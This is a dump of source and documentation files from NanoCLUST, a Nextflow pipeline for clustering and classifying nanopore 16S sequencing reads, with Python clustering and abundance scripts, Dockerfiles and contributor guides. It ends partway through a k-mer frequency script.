"text": "#!/usr/bin/env python\nfrom __future__ import print_function\nfrom collections import OrderedDict\nimport re\n\n# TODO nf-core: Add additional regexes for new tools in process get_software_versions\nregexes = {\n 'nf-core/nanoclust': ['v_pipeline.txt', r\"(\\S+)\"],\n 'Nextflow': ['v_nextflow.txt', r\"(\\S+)\"],\n 'FastQC': ['v_fastqc.txt', r\"FastQC v(\\S+)\"],\n 'MultiQC': ['v_multiqc.txt', r\"multiqc, version (\\S+)\"],\n}\nresults = OrderedDict()\nresults['nf-core/nanoclust'] = '<span style=\"color:#999999;\\\">N/A</span>'\nresults['Nextflow'] = '<span style=\"color:#999999;\\\">N/A</span>'\nresults['FastQC'] = '<span style=\"color:#999999;\\\">N/A</span>'\nresults['MultiQC'] = '<span style=\"color:#999999;\\\">N/A</span>'\n\n# Search each file using its regex\nfor k, v in regexes.items():\n try:\n with open(v[0]) as x:\n versions = x.read()\n match = re.search(v[1], versions)\n if match:\n results[k] = \"v{}\".format(match.group(1))\n except IOError:\n results[k] = False\n\n# Remove software set to false in results\nfor k in results:\n if not results[k]:\n del(results[k])\n\n# Dump to YAML\nprint ('''\nid: 'software_versions'\nsection_name: 'nf-core/nanoclust Software Versions'\nsection_href: 'https://github.com/nf-core/nanoclust'\nplot_type: 'html'\ndescription: 'are collected at run time from the software output.'\ndata: |\n <dl class=\"dl-horizontal\">\n''')\nfor k,v in results.items():\n print(\" <dt>{}</dt><dd><samp>{}</samp></dd>\".format(k,v))\nprint (\" </dl>\")\n\n# Write out regexes as csv file:\nwith open('software_versions.csv', 'w') as f:\n for k,v in results.items():\n f.write(\"{}\\t{}\\n\".format(k,v))\n"
},
{
"alpha_fraction": 0.744425356388092,
"alphanum_fraction": 0.7722984552383423,
"avg_line_length": 47.58333206176758,
"blob_id": "439fb4ecfd95ca3394b428f22c05963be5846920",
"content_id": "93bc9df055f149891e874f74f48f294adabf949a",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 2341,
"license_type": "permissive",
"max_line_length": 632,
"num_lines": 48,
"path": "/docs/index.md",
"repo_name": "genomicsITER/NanoCLUST",
"src_encoding": "UTF-8",
"text": "\n\n**De novo clustering and consensus building for ONT 16S sequencing data**.\n\n## Introduction\n\nThe pipeline is built using [Nextflow](https://www.nextflow.io), a workflow tool to run tasks across multiple compute infrastructures in a very portable manner. It comes with docker containers making installation trivial and results highly reproducible.\n\n## Quick Start\n\ni. Install [`nextflow`](https://nf-co.re/usage/installation)\n\nii. Install [`docker`](https://docs.docker.com/engine/installation/) or [`conda`](https://conda.io/miniconda.html)\n\niii. Clone the NanoCLUST repository and test the pipeline on a minimal dataset with a single command\n\n*Download a BLAST database for cluster sequence classification. For NCBI 16S rRNA database:\n\n```bash\nmkdir db db/taxdb\nwget https://ftp.ncbi.nlm.nih.gov/blast/db/16S_ribosomal_RNA.tar.gz && tar -xzvf 16S_ribosomal_RNA.tar.gz -C db\nwget https://ftp.ncbi.nlm.nih.gov/blast/db/taxdb.tar.gz && tar -xzvf taxdb.tar.gz -C db/taxdb\n```\n\n```bash\nnextflow run main.nf -profile test,<dockerconda>\n```\n\niv. Start running your own analysis!\n\nRun a single sample analysis using default parameters:\n\n```bash\nnextflow run main.nf -profile <conda,docker> --reads 'sample.fastq' --db \"fullpath/to/nanoclust/db/16S_ribosomal_RNA\" --tax \"fullpath/to/nanoclust/db/taxdb/\"\n```\n\nSee usage and output sections for all of the available options when running the pipeline.\n\n\n## Credits\n\nRodríguez-Pérez H, Ciuffreda L, Flores C (2020). NanoCLUST: a species-level analysis of 16S rRNA nanopore sequencing data. Submitted.\n\nThis work was supported by Instituto de Salud Carlos III [PI14/00844, PI17/00610, and FI18/00230] and co-financed by the European Regional Development Funds, “A way of making Europe” from the European Union; Ministerio de Ciencia e Innovación [RTC-2017-6471-1, AEI/FEDER, UE]; Cabildo Insular de Tenerife [CGIEU0000219140]; Fundación Canaria Instituto de Investigación Sanitaria de Canarias [PIFUN48/18]; and by the agreement with Instituto Tecnológico y de Energías Renovables (ITER) to strengthen scientific and technological education, training, research, development and innovation in Genomics, Personalized Medicine and Biotechnology [OA17/008]. \n\n## Contributions and Support\n\nIf you would like to contribute to this pipeline, please see the contributing guidelines\n"
},
{
"alpha_fraction": 0.6588652729988098,
"alphanum_fraction": 0.6801418662071228,
"avg_line_length": 36.105262756347656,
"blob_id": "005b186bd601d3e1f3f0dae5f7513a4329396924",
"content_id": "ea7e5f38cebf76035d17ccf0ba886e08fd654447",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1410,
"license_type": "permissive",
"max_line_length": 159,
"num_lines": 38,
"path": "/templates/umap_hdbscan.py",
"repo_name": "genomicsITER/NanoCLUST",
"src_encoding": "UTF-8",
"text": "#!/usr/bin/env python\n\nimport numpy as np\nimport umap\nimport matplotlib.pyplot as plt\nfrom sklearn import decomposition\nimport random\nimport pandas as pd\nimport hdbscan\n\ndf = pd.read_csv(\"$kmer_freqs\", delimiter=\"\\t\")\n\n#UMAP\nmotifs = [x for x in df.columns.values if x not in [\"read\", \"length\"]]\nX = df.loc[:,motifs]\nX_embedded = umap.UMAP(n_neighbors=15, min_dist=0.1, verbose=2).fit_transform(X)\n\ndf_umap = pd.DataFrame(X_embedded, columns=[\"D1\", \"D2\"])\numap_out = pd.concat([df[\"read\"], df[\"length\"], df_umap], axis=1)\n\n#HDBSCAN\nX = umap_out.loc[:,[\"D1\", \"D2\"]]\numap_out[\"bin_id\"] = hdbscan.HDBSCAN(min_cluster_size=int($params.min_cluster_size), cluster_selection_epsilon=int($params.cluster_sel_epsilon)).fit_predict(X)\n\n#PLOT\nplt.figure(figsize=(20,20))\nplt.scatter(X_embedded[:, 0], X_embedded[:, 1], c=umap_out[\"bin_id\"], cmap='Spectral', s=1)\nplt.xlabel(\"UMAP1\", fontsize=18)\nplt.ylabel(\"UMAP2\", fontsize=18)\nplt.gca().set_aspect('equal', 'datalim')\nplt.title(\"Projecting \" + str(len(umap_out['bin_id'])) + \" reads. \" + str(len(umap_out['bin_id'].unique())) + \" clusters generated by HDBSCAN\", fontsize=18)\n\nfor cluster in np.sort(umap_out['bin_id'].unique()):\n read = umap_out.loc[umap_out['bin_id'] == cluster].iloc[0]\n plt.annotate(str(cluster), (read['D1'], read['D2']), weight='bold', size=14)\n\nplt.savefig('hdbscan.output.png')\numap_out.to_csv(\"hdbscan.output.tsv\", sep=\"\\t\", index=False)\n"
},
{
"alpha_fraction": 0.6245551705360413,
"alphanum_fraction": 0.6539145708084106,
"avg_line_length": 21.039215087890625,
"blob_id": "04a08b23298352d9d162ab1e841227f016d4888d",
"content_id": "abe1335070d84f0d9a17dae7b6d482341f7f59a8",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "R",
"length_bytes": 1124,
"license_type": "permissive",
"max_line_length": 86,
"num_lines": 51,
"path": "/bin/markdown_to_html.r",
"repo_name": "genomicsITER/NanoCLUST",
"src_encoding": "UTF-8",
"text": "#!/usr/bin/env Rscript\n\n# Command line argument processing\nargs = commandArgs(trailingOnly=TRUE)\nif (length(args) < 2) {\n stop(\"Usage: markdown_to_html.r <input.md> <output.html>\", call.=FALSE)\n}\nmarkdown_fn <- args[1]\noutput_fn <- args[2]\n\n# Load / install packages\nif (!require(\"markdown\")) {\n install.packages(\"markdown\", dependencies=TRUE, repos='http://cloud.r-project.org/')\n library(\"markdown\")\n}\n\nbase_css_fn <- getOption(\"markdown.HTML.stylesheet\")\nbase_css <- readChar(base_css_fn, file.info(base_css_fn)$size)\ncustom_css <- paste(base_css, \"\nbody {\n padding: 3em;\n margin-right: 350px;\n max-width: 100%;\n}\n#toc {\n position: fixed;\n right: 20px;\n width: 300px;\n padding-top: 20px;\n overflow: scroll;\n height: calc(100% - 3em - 20px);\n}\n#toc_header {\n font-size: 1.8em;\n font-weight: bold;\n}\n#toc > ul {\n padding-left: 0;\n list-style-type: none;\n}\n#toc > ul ul { padding-left: 20px; }\n#toc > ul > li > a { display: none; }\nimg { max-width: 800px; }\n\")\n\nmarkdownToHTML(\n file = markdown_fn,\n output = output_fn,\n stylesheet = custom_css,\n options = c('toc', 'base64_images', 'highlight_code')\n)\n"
},
{
"alpha_fraction": 0.6239669322967529,
"alphanum_fraction": 0.6268594861030579,
"avg_line_length": 33.617645263671875,
"blob_id": "2311d2eba1b33d7b5a1a01406676731301e0af79",
"content_id": "18a2d6a480920f56e2d92037cc38eabea4b6e41c",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2420,
"license_type": "permissive",
"max_line_length": 116,
"num_lines": 68,
"path": "/templates/get_abundance.py",
"repo_name": "genomicsITER/NanoCLUST",
"src_encoding": "UTF-8",
"text": "#!/usr/bin/env python\r\n\r\nimport numpy as np\r\nimport matplotlib.pyplot as plt\r\nfrom matplotlib import rc\r\nimport pandas as pd\r\nfrom functools import reduce\r\nimport requests\r\nimport json\r\n#https://unipept.ugent.be/apidocs/taxonomy\r\n\r\ndef get_taxname(tax_id,tax_level):\r\n tags = {\"S\": \"species_name\",\"G\": \"genus_name\",\"F\": \"family_name\",\"O\":'order_name', \"C\": \"class_name\"}\r\n tax_level_tag = tags[tax_level]\r\n #Avoids pipeline crash due to \"nan\" classification output. Thanks to Qi-Maria from Github\r\n if str(tax_id) == \"nan\":\r\n tax_id = 1\r\n \r\n path = 'http://api.unipept.ugent.be/api/v1/taxonomy.json?input[]=' + str(int(tax_id)) + '&extra=true&names=true'\r\n complete_tax = requests.get(path).text\r\n\r\n #Checks for API correct response (field containing the tax name). Thanks to devinbrown from Github\r\n try:\r\n name = json.loads(complete_tax)[0][tax_level_tag]\r\n except:\r\n name = str(int(tax_id))\r\n\r\n return json.loads(complete_tax)[0][tax_level_tag]\r\n\r\ndef get_abundance_values(names,paths):\r\n dfs = []\r\n for name,path in zip(names,paths):\r\n data = pd.read_csv(path, index_col=False, sep=';').iloc[:,1:]\r\n\r\n total = sum(data['reads_in_cluster'])\r\n rel_abundance=[]\r\n\r\n for index,row in data.iterrows():\r\n rel_abundance.append(row['reads_in_cluster'] / total)\r\n \r\n data['rel_abundance'] = rel_abundance\r\n dfs.append(pd.DataFrame({'taxid': data['taxid'], 'rel_abundance': rel_abundance}))\r\n data.to_csv(\"\" + name + \"_nanoclust_out.txt\")\r\n\r\n return dfs\r\n\r\ndef merge_abundance(dfs,tax_level):\r\n df_final = reduce(lambda left,right: pd.merge(left,right,on='taxid',how='outer').fillna(0), dfs)\r\n df_final[\"taxid\"] = [get_taxname(row[\"taxid\"], tax_level) for index, row in df_final.iterrows()]\r\n df_final_grp = df_final.groupby([\"taxid\"], as_index=False).sum()\r\n return df_final_grp\r\n\r\ndef get_abundance(names,paths,tax_level):\r\n if(not isinstance(paths, list)):\r\n paths = [paths]\r\n names = [names]\r\n\r\n dfs = get_abundance_values(names,paths)\r\n df_final_grp = merge_abundance(dfs, tax_level)\r\n df_final_grp.to_csv(\"rel_abundance_\"+ names[0] + \"_\" + tax_level + \".csv\", index = False)\r\n\r\npaths = \"$table\"\r\nnames = \"$barcode\"\r\n\r\nget_abundance(names,paths, \"G\")\r\nget_abundance(names,paths, \"S\")\r\nget_abundance(names,paths, \"O\")\r\nget_abundance(names,paths, \"F\")"
},
{
"alpha_fraction": 0.7313829660415649,
"alphanum_fraction": 0.7420212626457214,
"avg_line_length": 39.77777862548828,
"blob_id": "76674621db291b3f81aaacdb875cd7dc49294548",
"content_id": "cda875eec7821c4288b232eb8de0b7355d700930",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Dockerfile",
"length_bytes": 376,
"license_type": "permissive",
"max_line_length": 91,
"num_lines": 9,
"path": "/conda_envs/medaka_pass/Dockerfile",
"repo_name": "genomicsITER/NanoCLUST",
"src_encoding": "UTF-8",
"text": "FROM continuumio/miniconda3\r\nLABEL authors=\"Hector Rodriguez-Perez, Laura Ciuffreda\" \\\r\n description=\"Docker image containing all requirements for cluster_nanoclust pipeline\"\r\n\r\nCOPY environment.yml /\r\nRUN conda env create -f environment.yml && conda clean -a\r\nRUN apt update && apt install -y procps\r\nRUN chmod -R 777 /opt/conda/envs/medaka_pass\r\nENV PATH /opt/conda/envs/medaka_pass/bin:$PATH\r\n"
},
{
"alpha_fraction": 0.5867418646812439,
"alphanum_fraction": 0.6332862973213196,
"avg_line_length": 38.57143020629883,
"blob_id": "4b41f5072575b4b211966064d08a2b2f904090c9",
"content_id": "fc97f1baa6ee8a0996fe18d2a249cb6ab96e07ef",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1418,
"license_type": "permissive",
"max_line_length": 166,
"num_lines": 35,
"path": "/templates/plot_abundances_pool.py",
"repo_name": "genomicsITER/NanoCLUST",
"src_encoding": "UTF-8",
"text": "#!/usr/bin/env python\r\n\r\nimport numpy as np\r\nimport matplotlib.pyplot as plt\r\nfrom matplotlib import rc\r\nimport pandas as pd\r\n\r\ndef plot_multi(table):\r\n\r\n df_final_grp = pd.read_csv(table)\r\n bars = [df_final_grp.iloc[i,1:].values.tolist() for i in range(0,df_final_grp.shape[0])]\r\n barWidth = 0.25\r\n colors = ['#a6cee3','#3caea3','#1f78b4','#b2df8a','#33a02c','#fb9a99','#e31a1c','#d11141','#ffc425','#ff7f00','#cab2d6','#6a3d9a','#ffff99','#b15928']\r\n color_index = 0\r\n r = np.arange(0, (len(df_final_grp.columns) -1))\r\n\r\n graph_bars = []\r\n graph_bars.append(plt.bar(r, bars[0], color=colors[0], edgecolor='white', width=barWidth, label=df_final_grp.iloc[0,0]))\r\n bottomm = bars[0]\r\n\r\n for index in range(1,len(bars)):\r\n color_index = index if(index < len(colors)) else index%len(colors)\r\n graph_bars.append(plt.bar(r, bars[index], bottom=bottomm, color=colors[color_index], edgecolor='white', width=barWidth, label=df_final_grp.iloc[index,0]))\r\n bottomm = [i+j for i,j in zip(bottomm, bars[index])]\r\n\r\n plt.xticks(r, (df_final_grp.columns[1:]))\r\n plt.legend(graph_bars, df_final_grp[\"taxid\"], ncol=3, fontsize='large',title_fontsize=\"x-large\", loc='center',bbox_to_anchor=(0.5, -0.25))\r\n plt.savefig(\"\" + table + \".plot.png\", bbox_inches=\"tight\")\r\n\r\ntable = \"$table\"\r\n\r\nplot_multi(table)\r\nplot_multi(table)\r\nplot_multi(table)\r\nplot_multi(table)"
},
{
"alpha_fraction": 0.6860465407371521,
"alphanum_fraction": 0.699999988079071,
"avg_line_length": 38,
"blob_id": "511f77fb8df23dd3e170e3fce9223a3b2b54858c",
"content_id": "fa601c6d58986b9b36d81af4eb5f8cd8bff655ac",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 430,
"license_type": "permissive",
"max_line_length": 141,
"num_lines": 11,
"path": "/templates/fastani_ranking.py",
"repo_name": "genomicsITER/NanoCLUST",
"src_encoding": "UTF-8",
"text": "#!/usr/bin/env python\n\nimport sys\nimport numpy as np\nimport pandas as pd\nimport os\n\nfastani_results = pd.read_csv(\"$fastani_output\", sep=\"\\\\s+\",header=None, names=[\"read1\", \"reads2\", \"similarity\", \"parameter1\", \"parameter2\"])\nfastani_results = fastani_results.groupby(\"read1\").mean().sort_values(by=\"similarity\", ascending=False)\n\nos.system(\"sed 's/-/_/g' \" + fastani_results.index.values.astype(str)[0] + \" > draft_read.fasta\")\n\n"
},
{
"alpha_fraction": 0.6642857193946838,
"alphanum_fraction": 0.6952381134033203,
"avg_line_length": 21.157894134521484,
"blob_id": "b15c3f648889641b66fd6f4de5067fb2ff121344",
"content_id": "a71c8020d4d0a6fbaa0a07063f9f55a85d21e49f",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 420,
"license_type": "permissive",
"max_line_length": 67,
"num_lines": 19,
"path": "/templates/umap_plot.py",
"repo_name": "genomicsITER/NanoCLUST",
"src_encoding": "UTF-8",
"text": "#!/usr/bin/env python\n\nimport pandas as pd\nimport matplotlib.pyplot as plt\n\ndf = pd.read_csv(\"$hdbscan\", sep=\"\\t\")\n\nfig, ax1 = plt.subplots()\nfig.set_size_inches(13, 10)\n\n#labels\nax1.set_xlabel('UMAP1')\nax1.set_ylabel('UMAP2')\nax1.set_title('UMAP+HDBSCAN clustering')\n\n#TO DO\n#Set square axis for proper UMAP representation\nplt.scatter(df['D1'], df['D2'], cmap='Paired', c=df['bin_id'], s=2)\nplt.savefig(\"umap_plot.png\")"
},
{
"alpha_fraction": 0.7703322172164917,
"alphanum_fraction": 0.7717640399932861,
"avg_line_length": 60.26315689086914,
"blob_id": "f3fa74611ce4150e3af2db351130cd4557cbf7cc",
"content_id": "da837ed0610d8bf7fa62d3b6bd09beff697ef57e",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": true,
"language": "Markdown",
"length_bytes": 3492,
"license_type": "permissive",
"max_line_length": 300,
"num_lines": 57,
"path": "/.github/CONTRIBUTING.md",
"repo_name": "genomicsITER/NanoCLUST",
"src_encoding": "UTF-8",
"text": "# nf-core/nanoclust: Contributing Guidelines\n\nHi there!\nMany thanks for taking an interest in improving nf-core/nanoclust.\n\nWe try to manage the required tasks for nf-core/nanoclust using GitHub issues, you probably came to this page when creating one.\nPlease use the pre-filled template to save time.\n\nHowever, don't be put off by this template - other more general issues and suggestions are welcome!\nContributions to the code are even more welcome ;)\n\n> If you need help using or modifying nf-core/nanoclust then the best place to ask is on the nf-core Slack [#nanoclust](https://nfcore.slack.com/channels/nanoclust) channel ([join our Slack here](https://nf-co.re/join/slack)).\n\n## Contribution workflow\n\nIf you'd like to write some code for nf-core/nanoclust, the standard workflow is as follows:\n\n1. Check that there isn't already an issue about your idea in the [nf-core/nanoclust issues](https://github.com/nf-core/nanoclust/issues) to avoid duplicating work\n * If there isn't one already, please create one so that others know you're working on this\n2. [Fork](https://help.github.com/en/github/getting-started-with-github/fork-a-repo) the [nf-core/nanoclust repository](https://github.com/nf-core/nanoclust) to your GitHub account\n3. Make the necessary changes / additions within your forked repository\n4. Submit a Pull Request against the `dev` branch and wait for the code to be reviewed and merged\n\nIf you're not used to this workflow with git, you can start with some [docs from GitHub](https://help.github.com/en/github/collaborating-with-issues-and-pull-requests) or even their [excellent `git` resources](https://try.github.io/).\n\n## Tests\n\nWhen you create a pull request with changes, [GitHub Actions](https://github.com/features/actions) will run automatic tests.\nTypically, pull-requests are only fully reviewed when these tests are passing, though of course we can help out before then.\n\nThere are typically two types of tests that run:\n\n### Lint Tests\n\n`nf-core` has a [set of guidelines](https://nf-co.re/developers/guidelines) which all pipelines must adhere to.\nTo enforce these and ensure that all pipelines stay in sync, we have developed a helper tool which runs checks on the pipeline code. 
This is in the [nf-core/tools repository](https://github.com/nf-core/tools) and once installed can be run locally with the `nf-core lint <pipeline-directory>` command.\n\nIf any failures or warnings are encountered, please follow the listed URL for more documentation.\n\n### Pipeline Tests\n\nEach `nf-core` pipeline should be set up with a minimal set of test-data.\n`GitHub Actions` then runs the pipeline on this data to ensure that it exits successfully.\nIf there are any failures then the automated tests fail.\nThese tests are run both with the latest available version of `Nextflow` and also the minimum required version that is stated in the pipeline code.\n\n## Patch\n\n: warning: Only in the unlikely and regretful event of a release happening with a bug.\n\n* On your own fork, make a new branch `patch` based on `upstream/master`.\n* Fix the bug, and bump version (X.Y.Z+1).\n* A PR should be made on `master` from patch to directly this particular bug.\n\n## Getting help\n\nFor further information/help, please consult the [nf-core/nanoclust documentation](https://nf-co.re/nf-core/nanoclust/docs) and don't hesitate to get in touch on the nf-core Slack [#nanoclust](https://nfcore.slack.com/channels/nanoclust) channel ([join our Slack here](https://nf-co.re/join/slack)).\n"
},
{
"alpha_fraction": 0.678657054901123,
"alphanum_fraction": 0.7026379108428955,
"avg_line_length": 36.90909194946289,
"blob_id": "e45000fc55187a4baf61ba6b8f2c2d39f38063ca",
"content_id": "4388d8476785cf5a6eb5a86ea4e84ea90ffe9ec2",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1251,
"license_type": "permissive",
"max_line_length": 159,
"num_lines": 33,
"path": "/templates/.ipynb_checkpoints/umap_hdbscan-checkpoint.py",
"repo_name": "genomicsITER/NanoCLUST",
"src_encoding": "UTF-8",
"text": "#!/usr/bin/env python\n\nimport numpy as np\nimport umap\nimport matplotlib.pyplot as plt\nfrom sklearn import decomposition\nimport random\nimport pandas as pd\nimport hdbscan\n\n\ndf = pd.read_csv(\"$kmer_freqs\", delimiter=\"\\t\")\n\n#UMAP\nmotifs = [x for x in df.columns.values if x not in [\"read\", \"length\"]]\nX = df.loc[:,motifs]\nX_embedded = umap.UMAP(n_neighbors=15, min_dist=0.1, verbose=2).fit_transform(X)\n\ndf_umap = pd.DataFrame(X_embedded, columns=[\"D1\", \"D2\"])\numap_out = pd.concat([df[\"read\"], df[\"length\"], df_umap], axis=1)\n\n#HDBSCAN\nX = umap_out.loc[:,[\"D1\", \"D2\"]]\numap_out[\"bin_id\"] = hdbscan.HDBSCAN(min_cluster_size=int($params.min_cluster_size), cluster_selection_epsilon=int($params.cluster_sel_epsilon)).fit_predict(X)\nplt.figure(figsize=(30,19))\nplt.scatter(X_embedded[:, 0], X_embedded[:, 1], c=umap_out[\"bin_id\"], cmap='Spectral', s=0.7)\nplt.gca().set_aspect('equal', 'datalim')\n#plt.colorbar(boundaries=np.arange(11)-0.5).set_ticks(np.arange(10))\ncluster_cnt = umap_out[\"bin_id\"].max()\nplt.colorbar(boundaries=np.arange(-1, cluster_cnt)-0.5).set_ticks(np.arange(-1, cluster_cnt))\nplt.title('UMAP projection of the Digits dataset', fontsize=24);\nplt.savefig('hdbscan.output.png')\numap_out.to_csv(\"output.hdbscan.tsv\", sep=\"\\t\", index=False)\n"
},
{
"alpha_fraction": 0.7423312664031982,
"alphanum_fraction": 0.745398759841919,
"avg_line_length": 39,
"blob_id": "534d7704a916510dab403c212dea6e7f0fe0c0d1",
"content_id": "760482c3cbaee34f7b650707b0d0916e08e7ad7f",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Dockerfile",
"length_bytes": 326,
"license_type": "permissive",
"max_line_length": 91,
"num_lines": 8,
"path": "/conda_envs/kmer_freqs/Dockerfile",
"repo_name": "genomicsITER/NanoCLUST",
"src_encoding": "UTF-8",
"text": "FROM continuumio/miniconda3\r\nLABEL authors=\"Hector Rodriguez-Perez, Laura Ciuffreda\" \\\r\n description=\"Docker image containing all requirements for cluster_nanoclust pipeline\"\r\n\r\nCOPY environment.yml /\r\nRUN conda env create -f environment.yml && conda clean -a\r\nRUN apt update && apt install -y procps\r\nENV PATH /opt/conda/envs/kmer_freq/bin:$PATH"
},
{
"alpha_fraction": 0.7985293865203857,
"alphanum_fraction": 0.8058823347091675,
"avg_line_length": 51.30769348144531,
"blob_id": "4a986376a3d257f3522fa167d7c7041d37293861",
"content_id": "65f2df7d71c1e3694e6e08c29fd49ba49fed421d",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 680,
"license_type": "permissive",
"max_line_length": 134,
"num_lines": 13,
"path": "/CONTRIBUTING.md",
"repo_name": "genomicsITER/NanoCLUST",
"src_encoding": "UTF-8",
"text": "# Contributing information\nTo contribute to the NanoCLUST repository using your GitHub accout, please, follow this steps:\n\n1. Create or update content within YOUR forked repository. Use your own folders and sub-folders corresponding to your contribution:\n2. Commit all your changes.\n3. To merge your contributions and changes into the NanoCLUST repository, please, open a Pull Request from your own forked repository.\n4. The request will be reviewed and merged by the NanoCLUST developers.\n\nRemember: all changes must be made from your repository fork.\n\n5. Finally, click on the green \"Pull Request\" button.\n\nWe will verify the contribution and merge your changes into NanoCLUST.\n"
},
{
"alpha_fraction": 0.6301096677780151,
"alphanum_fraction": 0.652043879032135,
"avg_line_length": 22.880952835083008,
"blob_id": "e32b530a9b5e590480ec3d116c274910fe21eae9",
"content_id": "ab8986664fb36dbac0c880b451badb73610d6d4f",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": true,
"language": "Markdown",
"length_bytes": 1003,
"license_type": "permissive",
"max_line_length": 81,
"num_lines": 42,
"path": "/.github/ISSUE_TEMPLATE/bug_report.md",
"repo_name": "genomicsITER/NanoCLUST",
"src_encoding": "UTF-8",
"text": "# nf-core/nanoclust bug report\n\nHi there!\n\nThanks for telling us about a problem with the pipeline.\nPlease delete this text and anything that's not relevant from the template below:\n\n## Describe the bug\n\nA clear and concise description of what the bug is.\n\n## Steps to reproduce\n\nSteps to reproduce the behaviour:\n\n1. Command line: `nextflow run ...`\n2. See error: _Please provide your error message_\n\n## Expected behaviour\n\nA clear and concise description of what you expected to happen.\n\n## System\n\n- Hardware: <!-- [e.g. HPC, Desktop, Cloud...] -->\n- Executor: <!-- [e.g. slurm, local, awsbatch...] -->\n- OS: <!-- [e.g. CentOS Linux, macOS, Linux Mint...] -->\n- Version <!-- [e.g. 7, 10.13.6, 18.3...] -->\n\n## Nextflow Installation\n\n- Version: <!-- [e.g. 19.10.0] -->\n\n## Container engine\n\n- Engine: <!-- [e.g. Conda, Docker or Singularity] -->\n- version: <!-- [e.g. 1.0.0] -->\n- Image tag: <!-- [e.g. nfcore/nanoclust:1.0.0] -->\n\n## Additional context\n\nAdd any other context about the problem here.\n"
},
{
"alpha_fraction": 0.5469169020652771,
"alphanum_fraction": 0.5524007081985474,
"avg_line_length": 32.63524627685547,
"blob_id": "b2a341fd82309d2af561c635833ffce053ddcbf4",
"content_id": "e4a52fb924b060cd1bd9e5fae48bc6754cab5a69",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 8206,
"license_type": "permissive",
"max_line_length": 149,
"num_lines": 244,
"path": "/bin/kmer_freq.py",
"repo_name": "genomicsITER/NanoCLUST",
"src_encoding": "UTF-8",
"text": "#!/usr/bin/env python\n\nimport sys\nfrom Bio import SeqIO\nfrom Bio.SeqIO.QualityIO import FastqGeneralIterator\nfrom Bio.SeqIO.FastaIO import SimpleFastaParser\nfrom collections import Counter,OrderedDict\nfrom itertools import product,groupby\nimport math\nimport multiprocessing\nimport pandas as pd\nfrom tqdm import tqdm\nimport argparse\n\ndef parse_args():\n # Create argument parser\n parser = argparse.ArgumentParser()\n\n # Positional mandatory arguments\n #parser.add_argument(\"fastx\", help=\"Fasta/fastq file containing read sequences\", type=str, default=\"$qced_reads\")\n\n # Optional arguments\n parser.add_argument(\"-k\", help=\"k-mer size [5]\", type=int, default=5)\n parser.add_argument('-r', action='store', dest='qced_reads', help='READS')\n parser.add_argument(\"-t\", \"--threads\", help=\"Number of threads to use [4]\", type=int, default=32)\n parser.add_argument(\"-c\", \"--count\", help=\"Provide raw k-mer raw counts, not normalized [False]\", action=\"store_true\", default=False)\n parser.add_argument(\"-f\", \"--frac\", help=\"Provide k-mer counts normalized by total number of k-mers [False]\", action=\"store_true\", default=False)\n\n # Parse arguments\n args = parser.parse_args()\n\n return args\n\ndef launch_pool( procs, funct, args ):\n p = multiprocessing.Pool(processes=procs)\n try:\n results = p.map(funct, args)\n p.close()\n p.join()\n except KeyboardInterrupt:\n p.terminate()\n return results\n\ndef chunks( l, n ):\n \"\"\"\n Yield successive n-sized chunks from l.\n \"\"\"\n for i in range(0, len(l), n):\n yield l[i:i+n]\n\ndef rev_comp_motif( motif ):\n \"\"\"\n Return the reverse complement of the input motif.\n \"\"\"\n COMP = {\"A\":\"T\", \\\n \"T\":\"A\", \\\n \"C\":\"G\", \\\n \"G\":\"C\", \\\n \"W\":\"S\", \\\n \"S\":\"W\", \\\n \"M\":\"K\", \\\n \"K\":\"M\", \\\n \"R\":\"Y\", \\\n \"Y\":\"R\", \\\n \"B\":\"V\", \\\n \"D\":\"H\", \\\n \"H\":\"D\", \\\n \"V\":\"B\", \\\n \"N\":\"N\", \\\n \"X\":\"X\", \\\n \"*\":\"*\"}\n rc_motif = []\n for char in motif[::-1]:\n rc_motif.append( COMP[char] )\n return \"\".join(rc_motif)\n\ndef build_all_kmers( k ):\n kmers = []\n for seq in product(\"ATGC\",repeat=k):\n kmers.append( \"\".join(seq) )\n return kmers\n\ndef combine_kmers_list( all_kmers ):\n combined = set()\n for kmer in all_kmers:\n if rev_comp_motif(kmer) in combined:\n pass\n else:\n combined.add(kmer)\n combined = list(combined)\n combined.sort()\n return combined\n\ndef kmer_freq ( seq_str, k, combined_kmers, kmer_names_only=False ):\n seq_str = seq_str.upper()\n \n all_kmer_n = Counter()\n for j in range( len(seq_str)-(k-1) ):\n motif = seq_str[j:j+k]\n all_kmer_n[motif] += 1\n\n # Combine forward and reverse complement motifs into one count\n combined_kmer_n = Counter()\n for kmer in combined_kmers:\n kmer_rc = rev_comp_motif(kmer)\n combined_kmer_n[kmer] = all_kmer_n[kmer] + all_kmer_n[kmer_rc]\n return combined_kmer_n\n\ndef calc_seq_kmer_freqs( tup ):\n read_id = tup[0]\n seq = tup[1]\n k = tup[2]\n combined_kmers = tup[3]\n i = tup[4]\n count = tup[5]\n frac = tup[6]\n \n seq_comp = []\n combined_kmer_n = kmer_freq( seq, k, combined_kmers )\n ord_combined_kmer_n = OrderedDict(sorted(combined_kmer_n.items()))\n\n for kmer,n in ord_combined_kmer_n.items():\n if count:\n kmer_comp = n\n elif frac:\n kmer_comp = float(n) / sum(combined_kmer_n.values())\n else:\n kmer_comp = math.log(float(n + 1) / sum(combined_kmer_n.values())) # adding pseudocount for log transform\n seq_comp.append(kmer_comp)\n\n return read_id, seq_comp\n\ndef 
